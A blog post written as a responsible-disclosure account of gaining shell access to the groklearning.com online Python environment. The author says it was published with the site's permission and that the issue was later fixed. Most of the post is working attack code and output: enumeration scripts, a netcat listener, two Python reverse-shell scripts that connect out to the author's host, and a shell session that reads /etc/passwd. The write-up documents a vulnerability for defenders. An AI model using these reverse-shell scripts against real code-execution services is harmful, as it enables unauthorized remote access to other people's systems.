How I managed to get shell access to groklearning.com

groklearning.com provides a platform for online education where one can learn how to program in Python.

It is one of these projects that make the world better by providing online & free education to people. If you are new to programming and want to learn some Python, I'd suggest you visit groklearning.com site and take some (why not all) of the courses they have!

I've been using groklearning.com myself and have been telling friends about it who wish to learn Python, but don't know where to start from.

Using groklearning.com you can write your Python script, which in turn is executed and result is displayed back to the user. This is very cool, because you don't have to bring Python with you all the time and simply use it from your browser, but this also comes with a risk...

What if someone manages to make the system serve a different purpose..? What if someone manages to turn this into a weapon..?

In this post we are going to explore the security of groklearning.com by trying to get shell access to the systems.

DISCLAIMER: The information provided here is for educational purposes only! Any unauthorized attempts to use this information for malicious acts may be disclosed to law enforcement authorities and result in criminal prosecution!

This post was published with the permission and agreement of the Security Team at groklearning.com.

Choosing our target

First thing I did is to choose a target. I've chosen the Eliza course and continued from there.

NOTE: Any other course would also work as long as it provides you with a window where you could write your Python script.

Checking active processes

The first Python script I've ran was to get a list of all active processes on the system. This would later allow me to identify any weak spots that I could use for my attack.

This is the script I've used:

  1. import subprocess
  2.  
  3. p = subprocess.Popen(['/bin/ps', '-ef'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
  4.  
  5. print(p.stdout.read())
  6. print(p.stderr.read())

From the output of the above script I was able to identify a number of things about the system, such as OS, Virtualization technology being used, etc..

Having a look around

It was time to have a look around and see what we've got on this system. I've started checking what's in /bin, /usr/bin, and other directories in order to identify anything that could be used as a weapon.

The system running my Python script was stripped down a bit, so you won't find all the UNIX/Linux tools you usually find on a default installation of a GNU/Linux system for example.

I've used this script to get what's in the different directories.

  1. import subprocess
  2.  
  3. p = subprocess.Popen(['/bin/ls', '-la', '/bin'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
  4.  
  5. print(p.stdout.read())
  6. print(p.stderr.read())

Okay, first thing noticed was that /bin/bash was there... Thought I'd give it try and see if I could start it...

I've quickly loaded my next Python script and executed it:

  1. import subprocess
  2.  
  3. p = subprocess.Popen(['/bin/bash', '--version'], stdout=subprocess.PIPE)
  4.  
  5. print(p.stdout.read())

I wasn't really hoping much for anything to happen, but then I got result back which was:

  1. GNU bash, version 4.2.37(1)-release (i686-pc-linux-gnu)
  2. Copyright (C) 2011 Free Software Foundation, Inc.
  3. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
  4.  
  5. This is free software; you are free to change and redistribute it.
  6. There is NO WARRANTY, to the extent permitted by law.

Okay, now I knew I could start a shell on the remote system, but I couldn't do much with it... at least for now...

Is outbound traffic allowed?

Time to check if outbound traffic is allowed. If outbound traffic was allowed I could write up a Python script which would spawn a reverse shell for me and grant me access.. Only if outbound traffic is allowed..

So, I've used this script to verify that outbound HTTP traffic is allowed.

  1. import socket
  2.  
  3. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        
  4. s.connect(("www.python.org" , 80))
  5. s.sendall(b"GET http://www.python.org HTTP/1.0\n\n")
  6. print(s.recv(4096))
  7. s.close()

I've loaded this script in Eliza and hit the run button. And the result was:

  1. HTTP/1.1 404 Not found
  2. Server: Varnish
  3. Retry-After: 0
  4. content-type: text/html
  5. Content-Length: 77
  6. Accept-Ranges: bytes
  7. Date: Tue, 04 Mar 2014 18:13:57 GMT
  8. Via: 1.1 varnish
  9. Connection: close
  10.  
  11.  
  12. <html>
  13. <head>
  14. <title> </title>
  15. </head>
  16. <body>
  17. unknown domain: </body></html>

The result from the script confirmed that outbound HTTP traffic is allowed, so I was ready to launch my first attack.

Launching the attack

I've created a listener on my machine on port 80 using netcat which I would later use for my reverse shell:

  1. # nc -l -p 80

Next thing I had to do is load a reverse shell script in Python to groklearning.com. This the script I've used for my Python reserve shell:

  1. import socket
  2. import subprocess
  3. import os
  4.  
  5. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  6. s.connect(('x.x.x.x', 80))
  7.  
  8. s.dup2(s.fileno(),0)
  9. os.dup2(s.fileno(),1)
  10. os.dup2(s.fileno(),2)
  11.  
  12. p = subprocess.call(['/bin/sh', '-i'])

As soon as I fired up the Python reverse shell I was able to see the shell prompt on my netcat listener:

  1. # nc -l 80
  2. $

Then I tried executing some shell commands:

  1. $ ls
  2. /bin/sh: 1: Cannot fork
  3. $ pwd
  4. /tmp/tmphBjnv5
  5. $ cat /etc/passwd
  6. /bin/sh: 3: Cannot fork
  7. $ uname -a
  8. /bin/sh: 4: Cannot fork
  9. $ ^D

Unfortunately, I wasn't able to do much with my reverse shell, as it seems there were some limits in place, so I went further into checking things on the target machine.

Checking our limits

Next thing I did is to check the limits on the target system. I've used the following Python script to check our limits:

  1. import subprocess
  2.  
  3. p = subprocess.Popen(['/bin/bash', '-c', 'ulimit -a'], stdout=subprocess.PIPE)
  4.  
  5. print(p.stdout.read())

The result I got was this:

  1. core file size          (blocks, -c) 0
  2. data seg size           (kbytes, -d) unlimited
  3. scheduling priority             (-e) 0
  4. file size               (blocks, -f) unlimited
  5. pending signals                 (-i) 13371
  6. max locked memory       (kbytes, -l) 64
  7. max memory size         (kbytes, -m) unlimited
  8. open files                      (-n) 1024
  9. pipe size            (512 bytes, -p) 8
  10. POSIX message queues     (bytes, -q) 819200
  11. real-time priority              (-r) 0
  12. stack size              (kbytes, -s) 8192
  13. cpu time               (seconds, -t) 3
  14. max user processes              (-u) 3
  15. virtual memory          (kbytes, -v) 102400
  16. file locks                      (-x) unlimited

As you could see from the above output we were limited to just 3 users processes... Apparently, I wasn't going to get my shell so easily so I had to think up something else...

Launching the second attack

It was time to launch a second attack, but this time using os.execv() instead of subprocess.call()

So, I've started my netcat listener again, and then used this script for my reverse shell:

  1. import socket
  2. import os
  3.  
  4. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  5. s.connect(('x.x.x.x', 80))
  6.  
  7. os.dup2(s.fileno(),0)
  8. os.dup2(s.fileno(),1)
  9. os.dup2(s.fileno(),2)
  10.  
  11. os.execv('/bin/sh', ['-i'])

The result this time was this:

  1. # nc -l 80
  2.  
  3. pwd
  4. /tmp/tmpEMZgWN
  5.  
  6. ls -la
  7. total 4
  8. drwx------ 3 39540956 1002    0 Mar  4 18:22 .
  9. drwx--x--x 4     1001 root 4096 Mar  4 18:22 ..
  10. -rw------- 1 39540956 1002  263 Mar  4 18:22 program.py
  11.  
  12. uname -a
  13. Linux prod-terminal00-eu-west-1 3.8.0-35-generic #50-Ubuntu SMP Tue Dec 3 01:24:59 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
  14.  
  15. cat /etc/passwd
  16. root:x:0:0:root:/root:/bin/bash
  17. daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  18. bin:x:2:2:bin:/bin:/bin/sh
  19. sys:x:3:3:sys:/dev:/bin/sh
  20. sync:x:4:65534:sync:/bin:/bin/sync
  21. games:x:5:60:games:/usr/games:/bin/sh
  22. man:x:6:12:man:/var/cache/man:/bin/sh
  23. lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  24. mail:x:8:8:mail:/var/mail:/bin/sh
  25. news:x:9:9:news:/var/spool/news:/bin/sh
  26. uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  27. proxy:x:13:13:proxy:/bin:/bin/sh
  28. www-data:x:33:33:www-data:/var/www:/bin/sh
  29. backup:x:34:34:backup:/var/backups:/bin/sh
  30. list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  31. irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  32. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  33. nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  34. libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  35.  
  36. cat /etc/issue
  37. Ubuntu 12.10 \n \l
  38.  
  39. whereis vi
  40. vi:
  41.  
  42. cat > hello.txt <<__EOF__
  43. Hi, there!
  44. __EOF__
  45.  
  46. cat hello.txt
  47. Hi, there!
  48.  
  49. ls -la
  50. total 4
  51. drwx------ 4 39540956 1002    0 Mar  4 18:22 .
  52. drwx--x--x 4     1001 root 4096 Mar  4 18:23 ..
  53. -rw------- 1 39540956 1002   11 Mar  4 18:23 hello.txt
  54. -rw------- 1 39540956 1002  263 Mar  4 18:22 program.py
  55.  
  56. cat program.py
  57. # Enter your code for "Interacting with Eliza" here.
  58.  
  59.  
  60. import socket
  61. import os
  62.  
  63. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  64. s.connect(('x.x.x.x', 80))
  65.  
  66. os.dup2(s.fileno(),0)
  67. os.dup2(s.fileno(),1)
  68. os.dup2(s.fileno(),2)
  69.  
  70. os.execv('/bin/sh', ['-i'])

This time I managed to get my reserve shell and get access to the system running the groklearning.com Python code.

At this point I stopped and decided it was time to let the Security Team at groklearning.com know about the security issue.

Fixing the issue

Soon after I managed to get shell access to the system I mailed the Security Team at groklearning.com about this issue.

After sending the mail soon enough one of the guys from Security Team at groklearning.com contacted me and we had a conversation about the issue in order to further identify the root cause. A bit later the security issue was fixed and creating a reverse shell was no longer possible.

Now, we can all be a bit happier that groklearning.com is a bit safer than before with patching that security issue and continues to serve it's mission to educate people! :)